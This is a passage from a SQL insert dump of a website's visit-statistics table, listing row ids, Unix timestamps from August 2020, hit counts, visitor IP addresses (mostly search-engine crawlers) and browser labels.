,0,'17.58.99.7','other'),(532756,1597685617,1,1,0,0,'66.249.70.76','chrome'),(532757,1597685676,1,1,0,0,'157.55.39.119','other'),(532758,1597685819,1,1,0,0,'66.249.64.58','chrome'),(532759,1597685874,1,1,0,0,'66.249.70.78','chrome'),(532760,1597686153,8,8,0,0,'109.108.71.11','other'),(532761,1597687303,1,1,0,0,'5.255.253.105','other'),(532762,1597687313,1,1,0,0,'173.252.111.7','other'),(532763,1597687413,2,2,0,0,'91.196.177.229','chrome'),(532764,1597687498,8,8,0,0,'109.108.71.11','other'),(532765,1597687898,1,1,0,0,'5.45.207.92','other'),(532766,1597688185,1,1,0,0,'8.29.198.26','other'),(532767,1597688207,1,1,0,0,'207.46.13.92','other'),(532768,1597688447,1,1,0,0,'5.255.253.136','other'),(532769,1597689082,3,3,0,0,'66.249.70.78','chrome'),(532770,1597689536,8,8,0,0,'109.108.71.11','other'),(532771,1597689538,1,1,0,0,'66.249.70.76','chrome'),(532772,1597689764,1,1,0,0,'17.58.99.7','other'),(532773,1597689957,1,1,0,0,'5.255.253.105','other'),(532774,1597690529,1,1,0,0,'66.249.70.76','chrome'),(532775,1597691273,8,8,0,0,'109.108.71.11','other'),(532776,1597691368,1,1,0,0,'207.46.13.184','other'),(532777,1597691410,1,1,0,0,'66.249.70.80','chrome'),(532778,1597691448,1,1,0,0,'157.55.39.121','other'),(532779,1597691679,1,1,0,0,'173.252.111.18','other'),(532780,1597692091,1,1,0,0,'17.58.99.7','other'),(532781,1597692426,8,8,0,0,'109.108.71.11','other'),(532782,1597692731,1,1,0,0,'5.45.207.179','other'),(532783,1597693581,8,8,0,0,'109.108.71.11','other'),(532784,1597693894,1,1,0,0,'37.73.29.83','chrome'),(532785,1597694187,1,1,0,0,'66.249.70.78','chrome'),(532786,1597694621,1,1,0,0,'66.249.70.80','chrome'),(532787,1597694678,8,8,0,0,'109.108.71.11','other'),(532788,1597695246,2,2,0,0,'94.130.9.183','other'),(532789,1597695395,1,1,0,0,'37.73.29.83','chrome'),(532790,1597695646,1,1,0,0,'5.45.207.92','other'),(532791,1597695817,8,8,0,0,'109.108.71.11','other'),(532792,1597696038,1,1,0,0,'5.45.207.174','other'),(532793,1597696077,1,1,0,0,'66.249.70.78','chrome'),(532794,1597696401,1,1,0,0,'207.46.13.92','other'),(532795,1597696945,1,1,0,0,'207.46.13.106','other'),(532796,1597696980,8,8,0,0,'109.108.71.11','other'),(532797,1597697149,2,2,0,0,'95.213.141.126','opera'),(532798,1597697266,1,1,0,0,'207.46.13.129','other'),(532799,1597697470,1,1,0,0,'66.249.70.76','chrome'),(532800,1597698141,8,8,0,0,'109.108.71.11','other'),(532801,1597698927,1,1,0,0,'66.249.70.80','chrome'),(532802,1597699009,1,1,0,0,'8.29.198.26','other'),(532803,1597699281,1,1,0,0,'157.55.39.121','other'),(532804,1597699295,8,8,0,0,'109.108.71.11','other'),(532805,1597699485,1,1,0,0,'66.249.70.78','chrome'),(532806,1597699489,3,3,0,0,'66.249.70.76','chrome'),(532807,1597700434,8,8,0,0,'109.108.71.11','other'),(532808,1597701250,3,3,0,0,'66.249.70.76','chrome'),(532809,1597701605,8,8,0,0,'109.108.71.11','other'),(532810,1597701731,1,1,0,0,'207.46.13.9','other'),(532811,1597701747,1,1,0,0,'207.46.13.10','other'),(532812,1597701931,1,1,0,0,'66.249.70.80','chrome'),(532813,1597702541,1,1,0,0,'207.46.13.249','other'),(532814,1597702728,8,8,0,0,'109.108.71.11','other'),(532815,1597703216,1,1,0,0,'157.55.39.113','other'),(532816,1597703297,1,1,0,0,'13.92.214.62','other'),(532817,1597703409,1,1,0,0,'157.55.39.159','other'),(532818,1597703887,8,8,0,0,'109.108.71.11','other'),(532819,1597704280,1,1,0,0,'173.252.95.19','other'),(532820,1597704990,8,8,0,0,'109.108.71.11','other'),(532821,1597705046,1,1,0,0,'66.249.70.80','chrome'),(532822,1597705436,1,1,0,0,'66.249.64.60','chrome'),(532823,1597705493,2,2,0,0,'66.249.70.78','chrome'),(532824,1597706155,8,8,0,0,'109.108.71.11','other'),(532825,1597707010,1,1,0,0,'66.249.70.78','chrome'),(532826,1597707317,8,8,0,0,'109.108.71.11','other'),(532827,1597707457,1,1,0,0,'66.249.64.58','chrome'),(532828,1597707489,1,1,0,0,'17.58.99.7','other'),(532829,1597707581,1,1,0,0,'66.249.64.60','chrome'),(532830,1597708029,1,1,0,0,'5.45.207.174','other'),(532831,1597708120,1,1,0,0,'5.255.253.105','other'),(532832,1597708421,8,8,0,0,'109.108.71.11','other'),(532833,1597708508,1,1,0,0,'62.205.134.182','other'),(532834,1597709486,8,8,0,0,'109.108.71.11','other'),(532835,1597709764,1,1,0,0,'178.154.200.112','other'),(532836,1597709831,1,1,0,0,'8.29.198.26','other'),(532837,1597709896,1,1,0,0,'207.46.13.9','other'),(532838,1597710464,1,1,0,0,'5.45.207.174','other'),(532839,1597710559,8,8,0,0,'109.108.71.11','other'),(532840,1597710693,2,2,0,0,'66.249.70.78','chrome'),(532841,1597711425,1,1,0,0,'212.227.174.175','chrome'),(532842,1597711695,8,8,0,0,'109.108.71.11','other'),(532843,1597712185,1,1,0,0,'5.45.207.174','other'),(532844,1597712669,1,1,0,0,'66.249.70.76','chrome'),(532845,1597713015,8,8,0,0,'109.108.71.11','other'),(532846,1597714220,8,8,0,0,'109.108.71.11','other'),(532847,1597714569,1,1,0,0,'5.45.207.174','other'),(532848,1597714589,1,1,0,0,'5.45.207.92','other'),(532849,1597714690,1,1,0,0,'5.255.253.160','other'),(532850,1597715320,8,8,0,0,'109.108.71.11','other'),(532851,1597715407,1,1,0,0,'5.45.207.154','other'),(532852,1597715782,67,67,0,0,'173.231.59.209','other'),(532853,1597716352,1,1,0,0,'207.46.13.129','other'),(532854,1597716434,8,8,0,0,'109.108.71.11','other'),(532855,1597716567,1,1,0,0,'5.45.207.92','other'),(532856,1597716687,15,15,0,0,'173.231.59.209','other'),(532857,1597717025,1,1,0,0,'178.154.200.112','other'),(532858,1597717551,8,8,0,0,'109.108.71.11','other'),(532859,1597717591,1,1,0,0,'176.193.8.94','firefox'),(532860,1597717596,1,1,0,0,'23.94.154.239','firefox'),(532861,1597717754,1,1,0,0,'66.249.70.80','chrome'),(532862,1597718140,1,1,0,0,'91.196.178.84','firefox'),(532863,1597718187,1,1,0,0,'66.249.70.76','chrome'),(532864,1597718647,8,8,0,0,'109.108.71.11','other'),(532865,1597718989,1,1,0,0,'157.55.39.153','other'),(532866,1597719567,1,1,0,0,'157.55.39.193','other'),(532867,1597719568,2,2,0,0,'66.249.70.78','chrome'),(532868,1597719648,1,1,0,0,'66.249.70.76','chrome'),(532869,1597719730,8,8,0,0,'109.108.71.11','other'),(532870,1597720491,1,1,0,0,'66.249.70.80','chrome'),(532871,1597720650,1,1,0,0,'8.29.198.25','other'),(532872,1597720815,8,8,0,0,'109.108.71.11','other'),(532873,1597721188,2,1,1,0,'66.249.70.76',''),(532874,1597721293,1,1,0,0,'51.178.60.145','firefox'),(532875,1597721295,1,1,0,0,'213.180.203.95','other'),(532876,1597721817,1,1,0,0,'66.249.70.76','chrome'),(532877,1597721980,1,1,0,0,'66.249.70.80','chrome'),(532878,1597721982,8,8,0,0,'109.108.71.11','other'),(532879,1597723122,8,8,0,0,'109.108.71.11','other'),(532880,1597724120,1,1,0,0,'66.249.70.80','chrome'),(532881,1597724966,1,1,0,0,'131.220.6.152','chrome'),(532882,1597725612,1,1,0,0,'66.249.70.78','chrome'),(532883,1597725862,2,2,0,0,'66.249.70.76','chrome'),(532884,1597726002,8,8,0,0,'109.108.71.11','other'),(532885,1597726722,1,1,0,0,'62.205.134.182','other'),(532886,1597727133,8,8,0,0,'109.108.71.11','other'),(532887,1597728001,1,1,0,0,'91.196.178.79','chrome'),(532888,1597728103,1,1,0,0,'31.13.103.1','other'),(532889,1597728162,1,1,0,0,'66.249.70.80','chrome'),(532890,1597728190,2,2,0,0,'66.249.70.78','chrome'),(532891,1597728219,4,4,0,0,'66.249.70.76','chrome'),(532892,1597728284,8,8,0,0,'109.108.71.11','other'),(532893,1597728670,1,1,0,0,'66.249.64.60','chrome'),(532894,1597728792,1,1,0,0,'66.249.64.58','chrome'),(532895,1597729428,8,8,0,0,'109.108.71.11','other'),(532896,1597730484,1,1,0,0,'66.249.70.76','chrome'),(532897,1597730534,8,8,0,0,'109.108.71.11','other'),(532898,1597730960,1,1,0,0,'66.249.64.60','chrome'),(532899,1597731478,1,1,0,0,'8.29.198.25','other'),(532900,1597731662,1,1,0,0,'91.196.178.93','chrome'),(532901,1597731670,1,1,0,0,'5.45.207.174','other'),(532902,1597731687,8,8,0,0,'109.108.71.11','other'),(532903,1597731851,1,1,0,0,'91.196.178.72','chrome'),(532904,1597731877,1,1,0,0,'66.249.70.78','chrome'),(532905,1597731892,1,1,0,0,'66.249.70.76','chrome'),(532906,1597732078,218,218,0,0,'46.4.107.106','other'),(532907,1597732841,8,8,0,0,'109.108.71.11','other'),(532908,1597732883,1,1,0,0,'17.58.99.7','other'),(532909,1597732948,1,1,0,0,'66.249.70.78','chrome'),(532910,1597732984,157,157,0,0,'46.4.107.106','other'),(532911,1597733122,1,1,0,0,'66.249.64.58','chrome'),(532912,1597733129,1,1,0,0,'91.196.177.229','chrome'),(532913,1597733891,75,75,0,0,'46.4.107.106','other'),(532914,1597734017,2,2,0,0,'66.249.70.76','chrome'),(532915,1597734156,8,8,0,0,'109.108.71.11','other'),(532916,1597735118,1,1,0,0,'17.58.99.84','other'),(532917,1597735138,1,1,0,0,'66.249.70.78','chrome'),(532918,1597735420,8,8,0,0,'109.108.71.11','other'),(532919,1597735779,2,2,0,0,'67.205.165.53','other'),(532920,1597735788,2,2,0,0,'179.43.169.182','firefox'),(532921,1597735830,1,1,0,0,'65.154.226.109','chrome'),(532922,1597735902,1,1,0,0,'66.249.64.56','chrome'),(532923,1597736153,2,2,0,0,'66.249.70.78','chrome'),(532924,1597736416,1,1,0,0,'207.46.13.249','other'),(532925,1597736840,1,1,0,0,'66.249.70.80','chrome'),(532926,1597737041,1,1,0,0,'91.196.178.72','chrome'),(532927,1597737164,1,1,0,0,'95.216.96.244','other'),(532928,1597737691,1,1,0,0,'66.249.64.56','chrome'),(532929,1597737695,1,1,0,0,'66.249.64.60','chrome'),(532930,1597737736,1,1,0,0,'5.45.207.174','other'),(532931,1597738224,1,1,0,0,'95.216.96.244','other'),(532932,1597738475,2,2,0,0,'66.249.70.78','chrome'),(532933,1597738546,1,1,0,0,'95.152.48.20','chrome'),(532934,1597739122,1,1,0,0,'207.46.13.141','other'),(532935,1597739133,1,1,0,0,'66.249.70.80','chrome'),(532936,1597739424,1,1,0,0,'66.249.64.56','chrome'),(532937,1597739932,1,1,0,0,'37.57.81.21','chrome'),(532938,1597739980,1,1,0,0,'212.90.62.137','chrome'),(532939,1597740047,2,2,0,0,'178.92.84.131','chrome'),(532940,1597740072,2,2,0,0,'66.249.70.76','chrome'),(532941,1597740253,1,0,1,0,'66.249.70.78',''),(532942,1597740679,1,1,0,0,'66.249.70.80','chrome'),(532943,1597741336,1,1,0,0,'207.46.13.71','other'),(532944,1597741733,8,8,0,0,'109.108.71.11','other'),(532945,1597741750,1,1,0,0,'207.46.13.129','other'),(532946,1597741783,1,1,0,0,'91.196.178.79','chrome'),(532947,1597741786,1,1,0,0,'212.90.62.137','chrome'),(532948,1597741810,1,1,0,0,'66.249.70.80','chrome'),(532949,1597741888,1,1,0,0,'66.249.70.76','chrome'),(532950,1597742304,1,1,0,0,'8.29.198.27','other'),(532951,1597742308,1,1,0,0,'207.46.13.9','other'),(532952,1597742472,1,1,0,0,'176.193.8.94','chrome'),(532953,1597742475,1,1,0,0,'104.144.236.63','chrome'),(532954,1597742713,1,1,0,0,'66.249.64.60','chrome'),(532955,1597742982,1,1,0,0,'207.46.13.249','other'),(532956,1597742994,2,2,0,0,'66.249.70.78','chrome'),(532957,1597743486,1,1,0,0,'3.219.29.111','chrome'),(532958,1597743688,1,1,0,0,'77.111.244.55','chrome'),(532959,1597743811,1,1,0,0,'66.249.64.56','chrome'),(532960,1597743872,2,2,0,0,'66.249.70.80','chrome'),(532961,1597744254,1,1,0,0,'176.193.8.94','chrome'),(532962,1597744257,1,1,0,0,'23.236.148.13','chrome'),(532963,1597744909,1,1,0,0,'66.249.70.76','chrome'),(532964,1597745754,1,1,0,0,'212.90.62.137','chrome'),(532965,1597746901,1,1,0,0,'66.249.70.80','chrome'),(532966,1597747263,1,1,0,0,'157.55.39.113','other'),(532967,1597747896,3,3,0,0,'66.249.70.80','chrome'),(532968,1597748185,1,1,0,0,'212.90.62.137','chrome'),(532969,1597748333,2,2,0,0,'66.249.70.76','chrome'),(532970,1597748492,1,1,0,0,'37.73.114.6','chrome'),(532971,1597748959,1,1,0,0,'91.196.178.94','chrome'),(532972,1597749288,69,69,0,0,'173.231.59.209','other'),(532973,1597749529,1,1,0,0,'109.74.154.72','chrome'),(532974,1597750168,8,8,0,0,'109.108.71.11','other'),(532975,1597750191,13,13,0,0,'173.231.59.209','other'),(532976,1597750555,1,1,0,0,'157.55.39.159','other'),(532977,1597750573,2,2,0,0,'66.249.70.76','chrome'),(532978,1597750592,1,1,0,0,'207.46.13.91','other'),(532979,1597751558,2,2,0,0,'91.142.175.25','chrome'),(532980,1597752621,1,1,0,0,'213.108.45.138','firefox'),(532981,1597752692,3,3,0,0,'66.249.70.76','chrome'),(532982,1597752847,1,1,0,0,'157.55.39.159','other'),(532983,1597752880,6,6,0,0,'66.249.70.78','chrome'),(532984,1597753128,1,1,0,0,'8.29.198.25','other'),(532985,1597753296,1,1,0,0,'66.249.64.60','chrome'),(532986,1597753854,1,1,0,0,'66.249.70.78','chrome'),(532987,1597753978,1,1,0,0,'66.249.70.76','chrome'),(532988,1597754473,1,1,0,0,'91.196.178.72','chrome'),(532989,1597755550,1,1,0,0,'80.91.181.76','chrome'),(532990,1597755756,1,1,0,0,'157.55.39.108','other'),(532991,1597755955,8,8,0,0,'109.108.71.11','other'),(532992,1597755963,1,1,0,0,'148.251.8.250','other'),(532993,1597756194,1,1,0,0,'17.58.99.84','other'),(532994,1597757041,1,1,0,0,'66.249.64.58','chrome'),(532995,1597757229,1,1,0,0,'157.245.90.36','chrome'),(532996,1597757581,1,1,0,0,'207.46.13.141','other'),(532997,1597758157,1,1,0,0,'17.58.99.7','other'),(532998,1597758551,1,1,0,0,'95.152.48.20','chrome'),(532999,1597758648,1,1,0,0,'66.249.70.76','chrome'),(533000,1597760397,2,2,0,0,'66.249.70.76','chrome'),(533001,1597761486,1,1,0,0,'157.55.39.167','other'),(533002,1597762239,1,1,0,0,'207.46.13.129','other'),(533003,1597762882,2,2,0,0,'185.30.202.228','chrome'),(533004,1597762929,1,1,0,0,'66.249.70.80','chrome'),(533005,1597763096,2,2,0,0,'157.55.39.113','other'),(533006,1597763484,1,1,0,0,'17.58.99.7','other'),(533007,1597763959,1,1,0,0,'8.29.198.25','other'),(533008,1597764039,1,1,0,0,'66.249.70.76','chrome'),(533009,1597764069,85,85,0,0,'173.231.59.209','other'),(533010,1597764466,1,1,0,0,'17.58.99.84','other'),(533011,1597764523,1,1,0,0,'157.55.39.113','other'),(533012,1597764997,1,1,0,0,'173.231.59.209','other'),(533013,1597765053,1,1,0,0,'176.193.8.94','chrome'),(533014,1597765056,1,1,0,0,'192.3.28.63','chrome'),(533015,1597765221,8,8,0,0,'109.108.71.11','other'),(533016,1597766079,1,0,1,0,'66.249.70.78',''),(533017,1597767059,1,1,0,0,'66.249.70.78','chrome'),(533018,1597767589,6,6,0,0,'66.249.70.76','chrome'),(533019,1597767749,1,0,1,0,'66.249.70.80',''),(533020,1597767998,1,1,0,0,'91.209.11.236','other'),(533021,1597768091,1,1,0,0,'66.249.64.58','chrome'),(533022,1597768098,1,1,0,0,'207.46.13.129','other'),(533023,1597768104,4,4,0,0,'66.249.70.78','chrome'),(533024,1597768147,1,1,0,0,'66.249.64.60','chrome'),(533025,1597768517,2,2,0,0,'66.249.70.80','chrome'),(533026,1597768556,3,3,0,0,'66.249.70.76','chrome'),(533027,1597768730,1,1,0,0,'66.249.64.56','chrome'),(533028,1597769022,1,1,0,0,'66.249.64.58','chrome'),(533029,1597769541,4,4,0,0,'66.249.70.76','chrome'),(533030,1597769977,2,2,0,0,'82.193.98.163','chrome'),(533031,1597770237,1,1,0,0,'212.90.126.212','chrome'),(533032,1597771119,2,2,0,0,'66.249.70.80','chrome'),(533033,1597771443,1,1,0,0,'66.249.64.60','chrome'),(533034,1597771467,4,4,0,0,'66.249.70.78','chrome'),(533035,1597772012,1,1,0,0,'91.196.178.19','chrome'),(533036,1597772154,1,1,0,0,'209.17.96.242','other'),(533037,1597772598,2,2,0,0,'66.249.70.80','chrome'),(533038,1597772622,1,1,0,0,'207.46.13.129','other'),(533039,1597772783,1,1,0,0,'66.249.64.58','chrome'),(533040,1597772785,8,8,0,0,'109.108.71.11','other'),(533041,1597772846,1,1,0,0,'66.249.70.78','chrome'),(533042,1597773526,2,2,0,0,'66.249.70.76','chrome'),(533043,1597773967,1,1,0,0,'91.196.178.9','chrome'),(533044,1597774009,3,3,0,0,'66.249.70.78','chrome'),(533045,1597774152,1,1,0,0,'176.36.31.181','chrome'),(533046,1597774310,1,1,0,0,'207.46.13.9','other'),(533047,1597774416,1,1,0,0,'66.249.64.58','chrome'),(533048,1597774593,1,1,0,0,'66.249.70.76','chrome'),(533049,1597774785,1,1,0,0,'8.29.198.27','other'),(533050,1597774905,2,2,0,0,'66.249.64.60','chrome'),(533051,1597775342,2,2,0,0,'66.249.70.78','chrome'),(533052,1597775527,1,1,0,0,'17.58.99.7','other'),(533053,1597775584,3,3,0,0,'66.249.70.76','chrome'),(533054,1597775797,3,3,0,0,'66.249.70.80','chrome'),(533055,1597775851,1,1,0,0,'66.249.64.60','chrome'),(533056,1597777277,2,2,0,0,'66.249.70.80','chrome'),(533057,1597777512,1,1,0,0,'37.73.121.54','chrome'),(533058,1597777603,2,2,0,0,'66.249.70.78','chrome'),(533059,1597777906,1,1,0,0,'66.249.70.69','chrome'),(533060,1597778010,1,1,0,0,'157.55.39.211','other'),(533061,1597778294,1,1,0,0,'66.249.70.80','chrome'),(533062,1597778344,1,1,0,0,'66.249.64.58','chrome'),(533063,1597778351,2,2,0,0,'66.249.70.76','chrome'),(533064,1597779455,1,1,0,0,'157.55.39.109','other'),(533065,1597779508,1,1,0,0,'107.173.50.220','firefox'),(533066,1597779831,2,2,0,0,'66.249.70.78','chrome'),(533067,1597780257,2,2,0,0,'66.249.70.80','chrome'),(533068,1597780402,1,1,0,0,'207.46.13.141','other'),(533069,1597780413,2,2,0,0,'66.249.70.76','chrome'),(533070,1597781110,1,1,0,0,'66.249.64.60','chrome'),(533071,1597781369,1,1,0,0,'66.249.70.78','chrome'),(533072,1597781408,1,1,0,0,'173.252.111.6','other'),(533073,1597781557,4,4,0,0,'66.249.70.76','chrome'),(533074,1597781742,3,3,0,0,'66.249.70.80','chrome'),(533075,1597782112,1,1,0,0,'66.249.64.56','chrome'),(533076,1597782492,1,1,0,0,'66.249.64.60','chrome'),(533077,1597782713,1,1,0,0,'66.249.70.78','chrome'),(533078,1597782807,1,1,0,0,'207.46.13.129','other'),(533079,1597783221,1,1,0,0,'66.249.70.76','chrome'),(533080,1597783420,2,2,0,0,'66.249.70.80','chrome'),(533081,1597783766,2,2,0,0,'66.249.64.60','chrome'),(533082,1597784959,1,0,1,0,'66.249.70.78',''),(533083,1597785177,4,4,0,0,'66.249.70.78','chrome'),(533084,1597785615,1,1,0,0,'8.29.198.25','other'),(533085,1597785816,3,3,0,0,'66.249.70.80','chrome'),(533086,1597786253,1,1,0,0,'66.249.70.78','chrome'),(533087,1597786460,1,1,0,0,'207.46.13.92','other'),(533088,1597786943,1,1,0,0,'66.249.70.80','chrome'),(533089,1597787423,1,1,0,0,'66.249.70.78','chrome'),(533090,1597787526,2,2,0,0,'66.249.70.76','chrome'),(533091,1597787572,1,1,0,0,'66.249.64.60','chrome'),(533092,1597787942,1,1,0,0,'66.249.64.56','chrome'),(533093,1597787983,8,8,0,0,'109.108.71.11','other'),(533094,1597788535,3,3,0,0,'66.249.70.78','chrome'),(533095,1597788539,3,3,0,0,'66.249.70.76','chrome'),(533096,1597791019,1,1,0,0,'66.249.70.76','chrome'),(533097,1597791279,2,2,0,0,'66.249.70.80','chrome'),(533098,1597792012,2,2,0,0,'66.249.70.76','chrome'),(533099,1597792866,1,1,0,0,'157.55.39.108','other'),(533100,1597793803,1,1,0,0,'66.249.70.78','chrome'),(533101,1597794795,1,1,0,0,'207.46.13.23','other'),(533102,1597794899,1,1,0,0,'66.249.70.80','chrome'),(533103,1597794908,1,1,0,0,'62.205.134.182','other'),(533104,1597795379,1,1,0,0,'66.249.70.76','chrome'),(533105,1597795503,1,1,0,0,'66.249.64.58','chrome'),(533106,1597795734,2,2,0,0,'66.249.70.78','chrome'),(533107,1597796413,2,2,0,0,'66.249.70.80','chrome'),(533108,1597796439,1,1,0,0,'8.29.198.26','other'),(533109,1597796733,2,2,0,0,'66.249.70.76','chrome'),(533110,1597797113,1,1,0,0,'157.55.39.108','other'),(533111,1597797350,3,3,0,0,'66.249.70.80','chrome'),(533112,1597798387,2,2,0,0,'66.249.70.80','chrome'),(533113,1597798672,4,4,0,0,'66.249.70.78','chrome'),(533114,1597798789,1,1,0,0,'66.249.70.76','chrome'),(533115,1597799429,2,2,0,0,'66.249.70.80','chrome'),(533116,1597799628,3,3,0,0,'66.249.64.60','chrome'),(533117,1597799736,77,77,0,0,'173.231.59.209','other'),(533118,1597799806,3,3,0,0,'66.249.70.76','chrome'),(533119,1597800158,2,2,0,0,'66.249.70.78','chrome'),(533120,1597800645,57,57,0,0,'173.231.59.209','other'),(533121,1597800744,3,3,0,0,'66.249.70.76','chrome'),(533122,1597800965,3,3,0,0,'66.249.70.80','chrome'),(533123,1597801352,1,1,0,0,'66.249.64.60','chrome'),(533124,1597801455,1,1,0,0,'66.249.70.78','chrome'),(533125,1597801547,31,31,0,0,'173.231.59.209','other'),(533126,1597801725,2,2,0,0,'66.249.70.76','chrome'),(533127,1597801871,2,2,0,0,'66.249.64.56','chrome'),(533128,1597802543,3,3,0,0,'66.249.70.80','chrome'),(533129,1597803648,1,1,0,0,'23.236.210.155','firefox'),(533130,1597804286,1,1,0,0,'5.45.207.174','other'),(533131,1597804399,8,8,0,0,'109.108.71.11','other'),(533132,1597804526,1,1,0,0,'66.249.64.58','chrome'),(533133,1597804686,1,1,0,0,'66.249.70.76','chrome'),(533134,1597804733,2,2,0,0,'66.249.70.78','chrome'),(533135,1597804840,3,3,0,0,'66.249.70.80','chrome'),(533136,1597805235,1,1,0,0,'207.46.13.9','other'),(533137,1597805791,1,1,0,0,'13.92.214.62','chrome'),(533138,1597806710,1,1,0,0,'66.249.70.76','chrome'),(533139,1597807187,1,1,0,0,'66.249.64.60','chrome'),(533140,1597807266,1,1,0,0,'8.29.198.25','other'),(533141,1597807639,1,1,0,0,'207.46.13.86','other'),(533142,1597808040,1,1,0,0,'66.249.64.56','chrome'),(533143,1597808138,1,1,0,0,'17.58.99.84','other'),(533144,1597808321,1,1,0,0,'66.249.70.80','chrome'),(533145,1597808779,4,4,0,0,'66.249.70.78','chrome'),(533146,1597809227,3,3,0,0,'66.249.70.80','chrome'),(533147,1597809636,2,2,0,0,'66.249.70.76','chrome'),(533148,1597809786,8,8,0,0,'179.48.164.45','chrome'),(533149,1597809835,1,1,0,0,'66.249.70.78','chrome'),(533150,1597810128,1,1,0,0,'5.255.253.151','other'),(533151,1597810649,3,3,0,0,'66.249.70.76','chrome'),(533152,1597810806,1,1,0,0,'66.249.70.80','chrome'),(533153,1597811466,1,1,0,0,'17.58.99.84','other'),(533154,1597811484,1,1,0,0,'131.220.6.152','chrome'),(533155,1597811574,1,1,0,0,'66.249.64.56','chrome'),(533156,1597812761,1,1,0,0,'66.249.70.80','chrome'),(533157,1597812793,3,3,0,0,'66.249.70.78','chrome'),(533158,1597812917,4,4,0,0,'66.249.70.76','chrome'),(533159,1597813298,1,1,0,0,'62.205.134.182','other'),(533160,1597814023,2,2,0,0,'66.249.70.78','chrome'),(533161,1597814069,1,1,0,0,'91.196.178.79','chrome'),(533162,1597814564,1,1,0,0,'66.249.70.80','chrome'),(533163,1597814787,2,2,0,0,'66.249.64.56','chrome'),(533164,1597815241,1,1,0,0,'5.45.207.92','other'),(533165,1597815833,1,0,1,0,'66.249.70.76',''),(533166,1597815850,3,3,0,0,'66.249.70.76','chrome'),(533167,1597815953,4,4,0,0,'66.249.70.78','chrome'),(533168,1597816270,1,1,0,0,'66.249.64.56','chrome'),(533169,1597816273,2,2,0,0,'66.249.70.80','chrome'),(533170,1597816403,2,2,0,0,'94.130.9.183','other'),(533171,1597816543,1,1,0,0,'66.249.64.60','chrome'),(533172,1597816678,2,2,0,0,'66.249.64.58','chrome'),(533173,1597816938,2,2,0,0,'66.249.70.76','chrome'),(533174,1597817571,1,1,0,0,'207.46.13.67','other'),(533175,1597817749,1,1,0,0,'66.249.64.60','chrome'),(533176,1597817980,3,3,0,0,'66.249.70.76','chrome'),(533177,1597818093,1,1,0,0,'8.29.198.27','other'),(533178,1597818275,1,1,0,0,'66.249.70.80','chrome'),(533179,1597818751,1,1,0,0,'66.249.70.78','chrome'),(533180,1597818755,1,1,0,0,'66.249.64.56','chrome'),(533181,1597819798,1,1,0,0,'5.45.207.174','other'),(533182,1597819804,1,1,0,0,'91.124.118.207','chrome'),(533183,1597819863,1,1,0,0,'91.209.11.236','other'),(533184,1597819884,8,8,0,0,'109.108.71.11','other'),(533185,1597820052,1,1,0,0,'66.249.70.80','chrome'),(533186,1597820194,2,2,0,0,'66.249.70.76','chrome'),(533187,1597820364,1,1,0,0,'5.255.253.183','other'),(533188,1597820369,1,1,0,0,'66.249.70.78','chrome'),(533189,1597821441,3,3,0,0,'66.249.70.78','chrome'),(533190,1597821480,3,3,0,0,'66.249.70.76','chrome'),(533191,1597821939,4,3,1,0,'66.249.70.80',''),(533192,1597822193,2,2,0,0,'5.45.207.174','other'),(533193,1597822603,2,2,0,0,'66.249.70.76','chrome'),(533194,1597822646,1,1,0,0,'66.249.64.56','chrome'),(533195,1597822685,2,2,0,0,'66.249.70.80','chrome'),(533196,1597822968,1,1,0,0,'5.255.253.191','other'),(533197,1597823382,1,1,0,0,'5.255.253.183','other'),(533198,1597823641,3,3,0,0,'66.249.70.78','chrome'),(533199,1597824221,2,2,0,0,'66.249.70.80','chrome'),(533200,1597824302,2,2,0,0,'66.249.64.60','chrome'),(533201,1597824368,1,1,0,0,'5.45.207.174','other'),(533202,1597824390,1,1,0,0,'95.46.160.252','chrome'),(533203,1597824665,1,1,0,0,'66.249.70.78','chrome'),(533204,1597824675,1,1,0,0,'91.196.178.171','chrome'),(533205,1597824900,2,2,0,0,'66.249.64.58','chrome'),(533206,1597825205,1,1,0,0,'66.249.70.76','chrome'),(533207,1597825600,2,2,0,0,'66.249.70.78','chrome'),(533208,1597825913,6,6,0,0,'66.249.70.80','chrome'),(533209,1597826123,2,2,0,0,'66.249.64.56','chrome'),(533210,1597827239,2,2,0,0,'66.249.70.78','chrome'),(533211,1597827699,8,8,0,0,'109.108.71.11','other'),(533212,1597827747,1,1,0,0,'66.249.64.60','chrome'),(533213,1597828814,1,1,0,0,'93.74.195.210','firefox'),(533214,1597828915,1,1,0,0,'8.29.198.27','other'),(533215,1597829200,1,1,0,0,'178.154.200.115','other'),(533216,1597829269,2,2,0,0,'66.249.70.78','chrome'),(533217,1597829365,5,4,1,0,'66.249.70.76',''),(533218,1597829400,1,1,0,0,'66.249.64.60','chrome'),(533219,1597829432,4,4,0,0,'66.249.70.80','chrome'),(533220,1597829780,2,2,0,0,'157.55.39.148','other'),(533221,1597829789,1,1,0,0,'207.46.13.3','other'),(533222,1597830200,3,3,0,0,'66.249.70.76','chrome'),(533223,1597830453,4,4,0,0,'66.249.70.78','chrome'),(533224,1597830458,1,1,0,0,'17.58.99.84','other'),(533225,1597830648,1,1,0,0,'66.249.64.60','chrome'),(533226,1597830899,8,8,0,0,'109.108.71.11','other'),(533227,1597831116,1,1,0,0,'134.19.179.235','firefox'),(533228,1597831297,1,1,0,0,'77.111.244.60','chrome'),(533229,1597831836,1,1,0,0,'66.249.70.80','chrome'),(533230,1597832497,1,1,0,0,'207.46.13.241','other'),(533231,1597832970,1,1,0,0,'13.58.13.74','chrome'),(533232,1597833158,1,1,0,0,'66.249.64.56','chrome'),(533233,1597834054,1,1,0,0,'66.249.70.80','chrome'),(533234,1597834593,1,1,0,0,'5.45.207.92','other'),(533235,1597834699,2,2,0,0,'5.45.207.174','other'),(533236,1597834796,1,1,0,0,'5.255.253.183','other'),(533237,1597835134,1,1,0,0,'66.249.70.80','chrome'),(533238,1597835198,5,5,0,0,'66.249.70.76','chrome'),(533239,1597835446,1,1,0,0,'109.74.154.72','chrome'),(533240,1597835520,1,1,0,0,'95.152.48.20','chrome'),(533241,1597835829,2,2,0,0,'95.213.141.126','opera'),(533242,1597835942,81,81,0,0,'173.231.59.209','other'),(533243,1597835963,3,3,0,0,'66.249.70.78','chrome'),(533244,1597836058,1,1,0,0,'5.45.207.174','other'),(533245,1597836098,1,1,0,0,'66.249.64.58','chrome'),(533246,1597836311,1,1,0,0,'66.249.64.56','chrome'),(533247,1597836364,1,1,0,0,'66.249.70.80','chrome'),(533248,1597837024,1,1,0,0,'173.231.59.209','other'),(533249,1597837029,3,3,0,0,'66.249.70.78','chrome'),(533250,1597837879,6,6,0,0,'66.249.70.80','chrome'),(533251,1597837943,1,1,0,0,'66.249.64.58','chrome'),(533252,1597838000,2,2,0,0,'66.249.70.76','c